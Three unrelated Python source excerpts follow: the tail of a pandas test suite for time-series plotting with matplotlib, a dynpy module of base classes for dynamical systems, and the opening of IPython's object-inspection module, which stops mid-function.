idxl = date_range("2014-07-01 09:00", freq="100L", periods=500)
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
# high to low
_, ax = self.plt.subplots()
high.plot(ax=ax)
low.plot(ax=ax)
assert len(ax.get_lines()) == 2
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "L"
tm.close()
# low to high
_, ax = self.plt.subplots()
low.plot(ax=ax)
high.plot(ax=ax)
assert len(ax.get_lines()) == 2
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "L"
def test_irreg_dtypes(self):
# date
idx = [date(2000, 1, 1), date(2000, 1, 5), date(2000, 1, 20)]
df = DataFrame(np.random.randn(len(idx), 3), Index(idx, dtype=object))
_check_plot_works(df.plot)
# np.datetime64
idx = date_range("1/1/2000", periods=10)
idx = idx[[0, 2, 5, 9]].astype(object)
df = DataFrame(np.random.randn(len(idx), 3), idx)
_, ax = self.plt.subplots()
_check_plot_works(df.plot, ax=ax)
def test_time(self):
t = datetime(1, 1, 1, 3, 30, 0)
deltas = np.random.randint(1, 20, 3).cumsum()
ts = np.array([(t + timedelta(minutes=int(x))).time() for x in deltas])
df = DataFrame(
{"a": np.random.randn(len(ts)), "b": np.random.randn(len(ts))}, index=ts
)
fig, ax = self.plt.subplots()
df.plot(ax=ax)
# verify tick labels
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if s != 0:
xp = time(h, m, s).strftime("%H:%M:%S")
else:
xp = time(h, m, s).strftime("%H:%M")
assert xp == rs
def test_time_change_xlim(self):
t = datetime(1, 1, 1, 3, 30, 0)
deltas = np.random.randint(1, 20, 3).cumsum()
ts = np.array([(t + timedelta(minutes=int(x))).time() for x in deltas])
df = DataFrame(
{"a": np.random.randn(len(ts)), "b": np.random.randn(len(ts))}, index=ts
)
fig, ax = self.plt.subplots()
df.plot(ax=ax)
# verify tick labels
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if s != 0:
xp = time(h, m, s).strftime("%H:%M:%S")
else:
xp = time(h, m, s).strftime("%H:%M")
assert xp == rs
# change xlim
ax.set_xlim("1:30", "5:00")
# check tick labels again
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if s != 0:
xp = time(h, m, s).strftime("%H:%M:%S")
else:
xp = time(h, m, s).strftime("%H:%M")
assert xp == rs
def test_time_musec(self):
t = datetime(1, 1, 1, 3, 30, 0)
deltas = np.random.randint(1, 20, 3).cumsum()
ts = np.array([(t + timedelta(microseconds=int(x))).time() for x in deltas])
df = DataFrame(
{"a": np.random.randn(len(ts)), "b": np.random.randn(len(ts))}, index=ts
)
fig, ax = self.plt.subplots()
ax = df.plot(ax=ax)
# verify tick labels
ticks = ax.get_xticks()
labels = ax.get_xticklabels()
for t, l in zip(ticks, labels):
m, s = divmod(int(t), 60)
us = round((t - int(t)) * 1e6)
h, m = divmod(m, 60)
rs = l.get_text()
if len(rs) > 0:
if (us % 1000) != 0:
xp = time(h, m, s, us).strftime("%H:%M:%S.%f")
elif (us // 1000) != 0:
xp = time(h, m, s, us).strftime("%H:%M:%S.%f")[:-3]
elif s != 0:
xp = time(h, m, s, us).strftime("%H:%M:%S")
else:
xp = time(h, m, s, us).strftime("%H:%M")
assert xp == rs
def test_secondary_upsample(self):
idxh = date_range("1/1/1999", periods=365, freq="D")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(ax=ax)
ax = high.plot(secondary_y=True, ax=ax)
for line in ax.get_lines():
assert PeriodIndex(line.get_xdata()).freq == "D"
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
for line in ax.left_ax.get_lines():
assert PeriodIndex(line.get_xdata()).freq == "D"
def test_secondary_legend(self):
fig = self.plt.figure()
ax = fig.add_subplot(211)
# ts
df = tm.makeTimeDataFrame()
df.plot(secondary_y=["A", "B"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert leg.get_texts()[0].get_text() == "A (right)"
assert leg.get_texts()[1].get_text() == "B (right)"
assert leg.get_texts()[2].get_text() == "C"
assert leg.get_texts()[3].get_text() == "D"
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
self.plt.close(fig)
fig = self.plt.figure()
ax = fig.add_subplot(211)
df.plot(secondary_y=["A", "C"], mark_right=False, ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert leg.get_texts()[0].get_text() == "A"
assert leg.get_texts()[1].get_text() == "B"
assert leg.get_texts()[2].get_text() == "C"
assert leg.get_texts()[3].get_text() == "D"
self.plt.close(fig)
fig, ax = self.plt.subplots()
df.plot(kind="bar", secondary_y=["A"], ax=ax)
leg = ax.get_legend()
assert leg.get_texts()[0].get_text() == "A (right)"
assert leg.get_texts()[1].get_text() == "B"
self.plt.close(fig)
fig, ax = self.plt.subplots()
df.plot(kind="bar", secondary_y=["A"], mark_right=False, ax=ax)
leg = ax.get_legend()
assert leg.get_texts()[0].get_text() == "A"
assert leg.get_texts()[1].get_text() == "B"
self.plt.close(fig)
fig = self.plt.figure()
ax = fig.add_subplot(211)
df = tm.makeTimeDataFrame()
ax = df.plot(secondary_y=["C", "D"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
self.plt.close(fig)
# non-ts
df = tm.makeDataFrame()
fig = self.plt.figure()
ax = fig.add_subplot(211)
ax = df.plot(secondary_y=["A", "B"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
self.plt.close()
fig = self.plt.figure()
ax = fig.add_subplot(211)
ax = df.plot(secondary_y=["C", "D"], ax=ax)
leg = ax.get_legend()
assert len(leg.get_lines()) == 4
assert ax.right_ax.get_legend() is None
colors = set()
for line in leg.get_lines():
colors.add(line.get_color())
# TODO: color cycle problems
assert len(colors) == 4
def test_format_date_axis(self):
rng = date_range("1/1/2012", periods=12, freq="M")
df = DataFrame(np.random.randn(len(rng), 3), rng)
_, ax = self.plt.subplots()
ax = df.plot(ax=ax)
xaxis = ax.get_xaxis()
for line in xaxis.get_ticklabels():
if len(line.get_text()) > 0:
assert line.get_rotation() == 30
def test_ax_plot(self):
x = date_range(start="2012-01-02", periods=10, freq="D")
y = list(range(len(x)))
_, ax = self.plt.subplots()
lines = ax.plot(x, y, label="Y")
tm.assert_index_equal(DatetimeIndex(lines[0].get_xdata()), x)
def test_mpl_nopandas(self):
dates = [date(2008, 12, 31), date(2009, 1, 31)]
values1 = np.arange(10.0, 11.0, 0.5)
values2 = np.arange(11.0, 12.0, 0.5)
kw = {"fmt": "-", "lw": 4}
_, ax = self.plt.subplots()
ax.plot_date([x.toordinal() for x in dates], values1, **kw)
ax.plot_date([x.toordinal() for x in dates], values2, **kw)
line1, line2 = ax.get_lines()
exp = np.array([x.toordinal() for x in dates], dtype=np.float64)
tm.assert_numpy_array_equal(line1.get_xydata()[:, 0], exp)
exp = np.array([x.toordinal() for x in dates], dtype=np.float64)
tm.assert_numpy_array_equal(line2.get_xydata()[:, 0], exp)
def test_irregular_ts_shared_ax_xlim(self):
# GH 2960
from pandas.plotting._matplotlib.converter import DatetimeConverter
ts = tm.makeTimeSeries()[:20]
ts_irregular = ts[[1, 4, 5, 6, 8, 9, 10, 12, 13, 14, 15, 17, 18]]
# plot the left section of the irregular series, then the right section
_, ax = self.plt.subplots()
ts_irregular[:5].plot(ax=ax)
ts_irregular[5:].plot(ax=ax)
# check that axis limits are correct
left, right = ax.get_xlim()
assert left <= DatetimeConverter.convert(ts_irregular.index.min(), "", ax)
assert right >= DatetimeConverter.convert(ts_irregular.index.max(), "", ax)
def test_secondary_y_non_ts_xlim(self):
# GH 3490 - non-timeseries with secondary y
index_1 = [1, 2, 3, 4]
index_2 = [5, 6, 7, 8]
s1 = Series(1, index=index_1)
s2 = Series(2, index=index_2)
_, ax = self.plt.subplots()
s1.plot(ax=ax)
left_before, right_before = ax.get_xlim()
s2.plot(secondary_y=True, ax=ax)
left_after, right_after = ax.get_xlim()
assert left_before >= left_after
assert right_before < right_after
def test_secondary_y_regular_ts_xlim(self):
# GH 3490 - regular-timeseries with secondary y
index_1 = date_range(start="2000-01-01", periods=4, freq="D")
index_2 = date_range(start="2000-01-05", periods=4, freq="D")
s1 = Series(1, index=index_1)
s2 = Series(2, index=index_2)
_, ax = self.plt.subplots()
s1.plot(ax=ax)
left_before, right_before = ax.get_xlim()
s2.plot(secondary_y=True, ax=ax)
left_after, right_after = ax.get_xlim()
assert left_before >= left_after
assert right_before < right_after
def test_secondary_y_mixed_freq_ts_xlim(self):
# GH 3490 - mixed frequency timeseries with secondary y
rng = date_range("2000-01-01", periods=10000, freq="min")
ts = Series(1, index=rng)
_, ax = self.plt.subplots()
ts.plot(ax=ax)
left_before, right_before = ax.get_xlim()
ts.resample("D").mean().plot(secondary_y=True, ax=ax)
left_after, right_after = ax.get_xlim()
# a downsample should not have changed either limit
assert left_before == left_after
assert right_before == right_after
def test_secondary_y_irregular_ts_xlim(self):
# GH 3490 - irregular-timeseries with secondary y
from pandas.plotting._matplotlib.converter import DatetimeConverter
ts = tm.makeTimeSeries()[:20]
ts_irregular = ts[[1, 4, 5, 6, 8, 9, 10, 12, 13, 14, 15, 17, 18]]
_, ax = self.plt.subplots()
ts_irregular[:5].plot(ax=ax)
# plot higher-x values on secondary axis
ts_irregular[5:].plot(secondary_y=True, ax=ax)
# ensure secondary limits aren't overwritten by plot on primary
ts_irregular[:5].plot(ax=ax)
left, right = ax.get_xlim()
assert left <= DatetimeConverter.convert(ts_irregular.index.min(), "", ax)
assert right >= DatetimeConverter.convert(ts_irregular.index.max(), "", ax)
def test_plot_outofbounds_datetime(self):
# 2579 - checking this does not raise
values = [date(1677, 1, 1), date(1677, 1, 2)]
_, ax = self.plt.subplots()
ax.plot(values)
values = [datetime(1677, 1, 1, 12), datetime(1677, 1, 2, 12)]
ax.plot(values)
def test_format_timedelta_ticks_narrow(self):
expected_labels = [f"00:00:00.0000000{i:0>2d}" for i in np.arange(10)]
rng = timedelta_range("0", periods=10, freq="ns")
df = DataFrame(np.random.randn(len(rng), 3), rng)
fig, ax = self.plt.subplots()
df.plot(fontsize=2, ax=ax)
self.plt.draw()
labels = ax.get_xticklabels()
result_labels = [x.get_text() for x in labels]
assert len(result_labels) == len(expected_labels)
assert result_labels == expected_labels
def test_format_timedelta_ticks_wide(self):
expected_labels = [
"00:00:00",
"1 days 03:46:40",
"2 days 07:33:20",
"3 days 11:20:00",
"4 days 15:06:40",
"5 days 18:53:20",
"6 days 22:40:00",
"8 days 02:26:40",
"9 days 06:13:20",
]
rng = timedelta_range("0", periods=10, freq="1 d")
df = DataFrame(np.random.randn(len(rng), 3), rng)
fig, ax = self.plt.subplots()
ax = df.plot(fontsize=2, ax=ax)
self.plt.draw()
labels = ax.get_xticklabels()
result_labels = [x.get_text() for x in labels]
assert len(result_labels) == len(expected_labels)
assert result_labels == expected_labels
def test_timedelta_plot(self):
# test issue #8711
s = Series(range(5), timedelta_range("1day", periods=5))
_, ax = self.plt.subplots()
_check_plot_works(s.plot, ax=ax)
# test long period
index = timedelta_range("1 day 2 hr 30 min 10 s", periods=10, freq="1 d")
s = Series(np.random.randn(len(index)), index)
_, ax = self.plt.subplots()
_check_plot_works(s.plot, ax=ax)
# test short period
index = timedelta_range("1 day 2 hr 30 min 10 s", periods=10, freq="1 ns")
s = Series(np.random.randn(len(index)), index)
_, ax = self.plt.subplots()
_check_plot_works(s.plot, ax=ax)
def test_hist(self):
# https://github.com/matplotlib/matplotlib/issues/8459
rng = date_range("1/1/2011", periods=10, freq="H")
x = rng
w1 = np.arange(0, 1, 0.1)
w2 = np.arange(0, 1, 0.1)[::-1]
_, ax = self.plt.subplots()
ax.hist([x, x], weights=[w1, w2])
def test_overlapping_datetime(self):
# GB 6608
s1 = Series(
[1, 2, 3],
index=[
datetime(1995, 12, 31),
datetime(2000, 12, 31),
datetime(2005, 12, 31),
],
)
s2 = Series(
[1, 2, 3],
index=[
datetime(1997, 12, 31),
datetime(2003, 12, 31),
datetime(2008, 12, 31),
],
)
# plot first series, then add the second series to those axes,
# then try adding the first series again
_, ax = self.plt.subplots()
s1.plot(ax=ax)
s2.plot(ax=ax)
s1.plot(ax=ax)
@pytest.mark.xfail(reason="GH9053 matplotlib does not use ax.xaxis.converter")
def test_add_matplotlib_datetime64(self):
# GH9053 - ensure that a plot with PeriodConverter still understands
# datetime64 data. This still fails because matplotlib overrides the
# ax.xaxis.converter with a DatetimeConverter
s = Series(np.random.randn(10), index=date_range("1970-01-02", periods=10))
ax = s.plot()
with tm.assert_produces_warning(DeprecationWarning):
# multi-dimensional indexing
ax.plot(s.index, s.values, color="g")
l1, l2 = ax.lines
tm.assert_numpy_array_equal(l1.get_xydata(), l2.get_xydata())
def test_matplotlib_scatter_datetime64(self):
# https://github.com/matplotlib/matplotlib/issues/11391
df = DataFrame(np.random.RandomState(0).rand(10, 2), columns=["x", "y"])
df["time"] = date_range("2018-01-01", periods=10, freq="D")
fig, ax = self.plt.subplots()
ax.scatter(x="time", y="y", data=df)
self.plt.draw()
label = ax.get_xticklabels()[0]
if self.mpl_ge_3_2_0:
expected = "2018-01-01"
elif self.mpl_ge_3_0_0:
expected = "2017-12-08"
else:
expected = "2017-12-12"
assert label.get_text() == expected
def test_check_xticks_rot(self):
# https://github.com/pandas-dev/pandas/issues/29460
# regular time series
x = to_datetime(["2020-05-01", "2020-05-02", "2020-05-03"])
df = DataFrame({"x": x, "y": [1, 2, 3]})
axes = df.plot(x="x", y="y")
self._check_ticks_props(axes, xrot=0)
# irregular time series
x = to_datetime(["2020-05-01", "2020-05-02", "2020-05-04"])
df = DataFrame({"x": x, "y": [1, 2, 3]})
axes = df.plot(x="x", y="y")
self._check_ticks_props(axes, xrot=30)
# use timeseries index or not
axes = df.set_index("x").plot(y="y", use_index=True)
self._check_ticks_props(axes, xrot=30)
axes = df.set_index("x").plot(y="y", use_index=False)
self._check_ticks_props(axes, xrot=0)
# separate subplots
axes = df.plot(x="x", y="y", subplots=True, sharex=True)
self._check_ticks_props(axes, xrot=30)
axes = df.plot(x="x", y="y", subplots=True, sharex=False)
self._check_ticks_props(axes, xrot=0)
def _check_plot_works(f, freq=None, series=None, *args, **kwargs):
import matplotlib.pyplot as plt
fig = plt.gcf()
try:
plt.clf()
ax = fig.add_subplot(211)
orig_ax = kwargs.pop("ax", plt.gca())
orig_axfreq = getattr(orig_ax, "freq", None)
ret = f(*args, **kwargs)
assert ret is not None # do something more intelligent
ax = kwargs.pop("ax", plt.gca())
if series is not None:
dfreq = series.index.freq
if isinstance(dfreq, BaseOffset):
dfreq = dfreq.rule_code
if orig_axfreq is None:
assert ax.freq == dfreq
if freq is not None and orig_axfreq is None:
assert ax.freq == freq
ax = fig.add_subplot(212)
kwargs["ax"] = ax
ret = f(*args, **kwargs)
assert ret is not None # TODO: do something more intelligent
with tm.ensure_clean(return_filelike=True) as path:
plt.savefig(path)
# GH18439, GH#24088, statsmodels#4772
with tm.ensure_clean(return_filelike=True) as path:
pickle.dump(fig, path)
finally:
plt.close(fig)
|
|
"""Module implementing some base classes useful for implementing dynamical
systems"""
from __future__ import division, print_function, absolute_import
import six
range = six.moves.range
map = six.moves.map
import numpy as np
from . import mx
from . import caching
from .mx import hashable_state
from .utils import readonlydict
# Constants for finding attractors
MAX_ATTRACTOR_LENGTH = 5
TRANSIENT_LENGTH = 30
class DynamicalSystem(object):
"""Base class for dynamical systems.
Parameters
----------
discrete_time : bool, optional
Whether updating should be done using discrete (default) or continuous
time dynamics.
"""
#: Whether the dynamical system obeys discrete- or continuous-time dynamics
discrete_time = True
def __init__(self, discrete_time=True):
self.discrete_time = discrete_time
if self.discrete_time:
self.iterate = self._iterate_discrete
self.iterate_1step = self._iterate_1step_discrete
else:
self.iterate = self._iterate_continuous
def iterate(self, start_state, max_time):
"""This method runs the dynamical system for `max_time` starting from
`start_state` and returns the result. In fact, this method is set at
run-time by the constructor to either `_iterateDiscrete` or
`_iterateContinuous` depending on whether the dynamical system object
is initialized with `discrete_time=True` or `discrete_time=False`. Thus,
sub-classes should override `_iterateDiscrete` and `_iterateContinuous`
instead of this method. See also
:meth:`dynpy.dynsys.DynamicalSystem.iterateOneStep`
Parameters
----------
start_state : numpy array or scipy.sparse matrix
Which state to start from
max_time : float
Until which point to run the dynamical system (number of iterations
for discrete-time systems or time limit for continuous-time systems)
Returns
-------
numpy array or scipy.sparse matrix
End state
"""
raise NotImplementedError
def iterate_1step(self, start_state):
"""
This method runs a discrete-time dynamical system for 1 timestep. At
run-time, the construct either repoints this method to `_iterateOneStep`
for discrete-time systems, or removes it for continuous time systems.
Parameters
----------
start_state : numpy array or scipy.sparse matrix
Which state to start from
Returns
-------
numpy array or scipy.sparse matrix
Iterated state
"""
raise NotImplementedError
def _iterate_1step_discrete(self, start_state):
raise NotImplementedError
def _iterate_continuous(self, start_state, max_time=1.0):
raise NotImplementedError
def _iterate_discrete(self, start_state, max_time=1.0):
if max_time == 1.0:
return self.iterate_1step(start_state)
elif max_time == 0.0:
return start_state
else:
cur_state = start_state
for i in range(int(max_time)):
cur_state = self.iterate_1step(cur_state)
return cur_state
def get_trajectory(self, start_state, max_time, num_points=None,
logscale=False):
"""This method get a trajectory of a dynamical system starting from
a particular starting state.
Parameters
----------
start_state : object
Which state to start from
max_time : float
Until which point to run the dynamical system (number of iterations
for discrete-time systems or time limit for continuous-time systems)
num_points : int, optional
How many timepoints to sample the trajectory at. This determines
how big each 'step size' is. By default, equal to ``int(max_time)``
logscale : bool, optional
Whether to sample the timepoints on a logscale or not (default)
Returns
-------
trajectory: numpy array
Array of states corresponding to trajectory
"""
# TODO: would this accumulate error for continuous case?
if num_points is None:
num_points = int(max_time)
if logscale:
timepoints = np.logspace(0, np.log10(max_time), num=num_points,
endpoint=True, base=10.0)
else:
timepoints = np.linspace(0, max_time, num=num_points, endpoint=True)
cur_state = start_state
trajectory = [cur_state,]
start_state_cls = mx.get_state_cls(start_state)
for t in range(1, len(timepoints)):
run_time = timepoints[t]-timepoints[t-1]
next_state = self.iterate(cur_state, max_time=run_time)
cur_state = start_state_cls.format_obj(next_state)
trajectory.append( cur_state )
return start_state_cls.vstack(trajectory)
class DeterministicDynamicalSystem(DynamicalSystem):
pass
class StochasticDynamicalSystem(DynamicalSystem):
pass
class DiscreteStateDynamicalSystem(DynamicalSystem):
def states(self):
raise NotImplementedError
def get_attractor_basins(self, sort=False, start_state_iter=None):
"""Computes the attractors and basins of the current discrete-state
dynamical system.
Parameters
----------
sort : bool, optional
Whether to sort attractors and basin states (slower).
start_state_iter : iterator, optional
Iterator to indicate which start-states to start from. If not
specified, tries all states.
Returns
-------
basin_atts : list of lists
A list of the the attractor states for each basin (basin order is
from largest basin to smallest).
basin_states : list of lists
A list of all the states in each basin (basin order is from largest
basin to smallest).
"""
state_basins = {}
attractors = {}
iteratefunc = self.iterate
if start_state_iter is None:
start_state_iter = self.states()
for raw_startstate in start_state_iter:
startstate = hashable_state(raw_startstate)
if startstate in state_basins:
continue
traj = set()
cstate = startstate
while True:
traj.add(cstate)
cstate = hashable_state(iteratefunc(cstate))
if cstate in traj: # cycle closed
cur_cycle = []
cyclestate = cstate
while True:
cur_cycle.append(cyclestate)
cyclestate = hashable_state(iteratefunc(cyclestate))
if cyclestate == cstate:
break
cur_cycle = tuple(sorted(cur_cycle))
if cur_cycle not in attractors:
cndx = len(attractors)
attractors[cur_cycle] = cndx
state_basins[cstate] = attractors[cur_cycle]
if cstate in state_basins:
for s in traj:
state_basins[s] = state_basins[cstate]
break
basins = [ [] for _ in range(len(attractors))]
for state, basin in six.iteritems(state_basins):
basins[basin].append(state)
keyfunc = lambda k: (-len(basins[attractors[k]]),k)
attractor_states = attractors.keys()
if sort:
attractor_states = sorted(attractor_states, key=keyfunc)
basins_states = []
for att in attractor_states:
cbasin = basins[attractors[att]]
if sort:
cbasin = sorted(cbasin)
basins_states.append(cbasin)
return attractor_states, basins_states
def print_attractor_basins(self):
"""Prints the attractors and basin of the dynamical system
>>> import dynpy
>>> rules = [ ['a',['a','b'],[1,1,1,0]],['b',['a','b'],[1,0,0,0]]]
>>> bn = dynpy.bn.BooleanNetwork(rules=rules)
>>> bn.print_attractor_basins()
* BASIN 1 : 2 States
ATTRACTORS:
a b
1 0
--------------------------------------------------------------------------------
* BASIN 2 : 1 States
ATTRACTORS:
a b
0 0
--------------------------------------------------------------------------------
* BASIN 3 : 1 States
ATTRACTORS:
a b
1 1
--------------------------------------------------------------------------------
"""
basin_atts, basin_states = self.get_attractor_basins(sort=True)
for cur_basin_ndx in range(len(basin_atts)):
print("* BASIN %d : %d States" %
(cur_basin_ndx+1, len(basin_states[cur_basin_ndx])))
print("ATTRACTORS:")
print(self._get_state_row_title())
for att in basin_atts[cur_basin_ndx]:
print(self._get_state_row_repr(att))
print("".join(['-', ] * 80))
def _get_state_row_repr(self, state):
return state
def _get_state_row_title(self):
return 'State'
class VectorDynamicalSystem(DynamicalSystem):
"""Mix-in for classes implementing dynamics over multivariate systems.
Parameters
----------
num_vars : int, optional
How many variables (i.e., how many 'dimensions' or 'nodes' are in the
dynamical system). Default is 1
var_names : list, optional
Names for the variables (optional). Default is simply the numeric
indexes of the variables.
discrete_time : bool, optional
Whether dynamical system is discrete or continuous time.
"""
#: The number of variables in the dynamical system
num_vars = None
def __init__(self, num_vars, var_names=None, discrete_time=True):
super(VectorDynamicalSystem,self).__init__(discrete_time)
self.num_vars = num_vars
self.var_names = tuple(var_names if var_names is not None
else range(self.num_vars))
"""The names of the variables in the dynamical system"""
# Make this a cached property so its not necessarily run every time a
# dynamical systems object is created, whether we need it or not
@caching.cached_data_prop
def var_name_ndxs(self):
"""A mapping from variables names to their indexes
"""
return dict((l, ndx) for ndx, l in enumerate(self.var_names))
def _get_state_row_repr(self, state):
row_format = "{:>7}" * self.num_vars
return row_format.format(*state)
def _get_state_row_title(self):
row_format = "{:>7}" * self.num_vars
return row_format.format(*self.var_names)
class DiscreteStateVectorDynamicalSystem(VectorDynamicalSystem,
DiscreteStateDynamicalSystem):
@caching.cached_data_method
def get_ndx2state_mx(self):
#: ``(num_states, num_vars)``-shaped matrix that maps from state indexes
#: to representations in terms of activations of the variables.
return np.vstack(self.states())
@caching.cached_data_method
def get_ndx2state_map(self):
return readonlydict( enumerate(self.states()) )
@caching.cached_data_method
def get_state2ndx_map(self):
return readonlydict(
{ hashable_state(v):k
for k, v in six.iteritems(self.get_ndx2state_map()) })
class ProjectedStateSpace(DiscreteStateVectorDynamicalSystem):
# TODO: Document
def __init__(self, keep_vars, base_sys, *kargs, **kwargs):
self.keep_vars = keep_vars
self.base_sys = base_sys
var_names = None
if base_sys.var_names is not None:
var_names = [base_sys.var_names[i] for i in keep_vars]
super(ProjectedStateSpace, self).__init__(
num_vars=len(keep_vars),
var_names=var_names,
*kargs, **kwargs)
def states(self):
done = set()
n2smx = self.base_sys.get_ndx2state_mx()
for c in map(hashable_state, n2smx[:,self.keep_vars]):
if c not in done:
done.add(c)
yield c
class LinearDynamicalSystem(VectorDynamicalSystem):
# TODO: TESTS
"""This class implements linear dynamical systems, whether continuous or
discrete-time. It is also used by :class:`dynpy.dynsys.MarkovChain` to
implement Markov Chain (discrete-case) or master equation (continuous-case)
dynamics.
For attribute definitions, see documentation of
:class:`dynpy.dynsys.DynamicalSystem`.
Parameters
----------
transition_matrix : numpy array or scipy.sparse matrix
Matrix defining the evolution of the dynamical system, i.e. the
:math:`\\mathbf{A}` in
:math:`\\mathbf{x_{t+1}} = \\mathbf{x_{t}}\\mathbf{A}` (in the
discrete-time case) or
:math:`\\dot{\\mathbf{x}} = \\mathbf{x}\\mathbf{A}` (in the
continuous-time case)
discrete_time : bool, optional
Whether updating should be done using discrete (default) or continuous
time dynamics.
"""
#: Transition matrix for linear system.
transition_matrix = None
def __init__(self, transition_matrix, discrete_time=True):
super(LinearDynamicalSystem, self).__init__(
num_vars=transition_matrix.shape[0],
discrete_time=discrete_time)
self.transition_matrix = transition_matrix
self.stable_eigenvalue = 1.0 if discrete_time else 0.0
def get_equilibrium_distribution(self):
"""Get equilibrium state of dynamical system using eigen-decomposition
Returns
-------
numpy array or scipy.sparse matrix
Equilibrium state
"""
vals, vecs = mx.get_largest_left_eigs(self.transition_matrix)
equil_evals = np.flatnonzero(np.abs(vals-self.stable_eigenvalue) < 1e-8)
if len(equil_evals) != 1:
raise Exception("Expected one stable eigenvalue, but found " +
"%d instead (%s)" % (len(equil_evals), equil_evals))
dist = np.real_if_close(np.ravel(vecs[equil_evals, :]))
if np.any(np.iscomplex(equil_evals)):
raise Exception("Expect equilibrium state to be real! %s" %
equil_evals)
return mx.format_mx(dist)
def _iterate_1step_discrete(self, start_state):
# For discrete time systems, one step
r = mx.format_mx(start_state).dot(self.transition_matrix)
return r
def _iterate_discrete(self, start_state, max_time=1.0):
# For discrete time systems
if max_time == 0.0:
return start_state
cls = mx.get_matrix_cls(self.transition_matrix)
r = cls.format_mx(start_state).dot(
cls.pow(self.transition_matrix, int(max_time)))
return r
def _iterate_continuous(self, start_state, max_time=1.0):
if max_time == 0.0:
return start_state
cls = mx.get_matrix_cls(self.transition_matrix)
curStartStates = cls.format_mx(start_state)
r = curStartStates.dot(
cls.expm(max_time * (self.transition_matrix)))
return r
# TODO
# def getMultistepDynsys(self, num_iters):
# import copy
# rObj = copy.copy(self)
# rObj.trans = self.transition_matrixCls.pow(self.transition_matrix, num_iters)
# return rObj
|
|
# -*- coding: utf-8 -*-
"""Tools for inspecting Python objects.
Uses syntax highlighting for presenting the various information elements.
Similar in spirit to the inspect module, but all calls take a name argument to
reference the name under which an object is being read.
"""
#*****************************************************************************
# Copyright (C) 2001-2004 Fernando Perez <[email protected]>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#*****************************************************************************
from __future__ import print_function
__all__ = ['Inspector','InspectColors']
# stdlib modules
import inspect
import linecache
import os
import types
import io as stdlib_io
try:
from itertools import izip_longest
except ImportError:
from itertools import zip_longest as izip_longest
# IPython's own
from IPython.core import page
from IPython.testing.skipdoctest import skip_doctest_py3
from IPython.utils import PyColorize
from IPython.utils import io
from IPython.utils import openpy
from IPython.utils import py3compat
from IPython.utils.text import indent
from IPython.utils.wildcard import list_namespace
from IPython.utils.coloransi import *
from IPython.utils.py3compat import cast_unicode
# builtin docstrings to ignore
_func_call_docstring = types.FunctionType.__call__.__doc__
_object_init_docstring = object.__init__.__doc__
_builtin_type_docstrings = set([
t.__doc__ for t in (types.ModuleType, types.MethodType, types.FunctionType)
])
#****************************************************************************
# Builtin color schemes
Colors = TermColors # just a shorthand
# Build a few color schemes
NoColor = ColorScheme(
'NoColor',{
'header' : Colors.NoColor,
'normal' : Colors.NoColor # color off (usu. Colors.Normal)
} )
LinuxColors = ColorScheme(
'Linux',{
'header' : Colors.LightRed,
'normal' : Colors.Normal # color off (usu. Colors.Normal)
} )
LightBGColors = ColorScheme(
'LightBG',{
'header' : Colors.Red,
'normal' : Colors.Normal # color off (usu. Colors.Normal)
} )
# Build table of color schemes (needed by the parser)
InspectColors = ColorSchemeTable([NoColor,LinuxColors,LightBGColors],
'Linux')
#****************************************************************************
# Auxiliary functions and objects
# See the messaging spec for the definition of all these fields. This list
# effectively defines the order of display
info_fields = ['type_name', 'base_class', 'string_form', 'namespace',
'length', 'file', 'definition', 'docstring', 'source',
'init_definition', 'class_docstring', 'init_docstring',
'call_def', 'call_docstring',
# These won't be printed but will be used to determine how to
# format the object
'ismagic', 'isalias', 'isclass', 'argspec', 'found', 'name'
]
def object_info(**kw):
"""Make an object info dict with all fields present."""
infodict = dict(izip_longest(info_fields, [None]))
infodict.update(kw)
return infodict
def get_encoding(obj):
"""Get encoding for python source file defining obj
Returns None if obj is not defined in a sourcefile.
"""
ofile = find_file(obj)
# run contents of file through pager starting at line where the object
# is defined, as long as the file isn't binary and is actually on the
# filesystem.
if ofile is None:
return None
elif ofile.endswith(('.so', '.dll', '.pyd')):
return None
elif not os.path.isfile(ofile):
return None
else:
# Print only text files, not extension binaries. Note that
# getsourcelines returns lineno with 1-offset and page() uses
# 0-offset, so we must adjust.
buffer = stdlib_io.open(ofile, 'rb') # Tweaked to use io.open for Python 2
encoding, lines = openpy.detect_encoding(buffer.readline)
return encoding
def getdoc(obj):
"""Stable wrapper around inspect.getdoc.
This can't crash because of attribute problems.
It also attempts to call a getdoc() method on the given object. This
allows objects which provide their docstrings via non-standard mechanisms
(like Pyro proxies) to still be inspected by ipython's ? system."""
# Allow objects to offer customized documentation via a getdoc method:
try:
ds = obj.getdoc()
except Exception:
pass
else:
# if we get extra info, we add it to the normal docstring.
if isinstance(ds, basestring):
return inspect.cleandoc(ds)
try:
docstr = inspect.getdoc(obj)
encoding = get_encoding(obj)
return py3compat.cast_unicode(docstr, encoding=encoding)
except Exception:
# Harden against an inspect failure, which can occur with
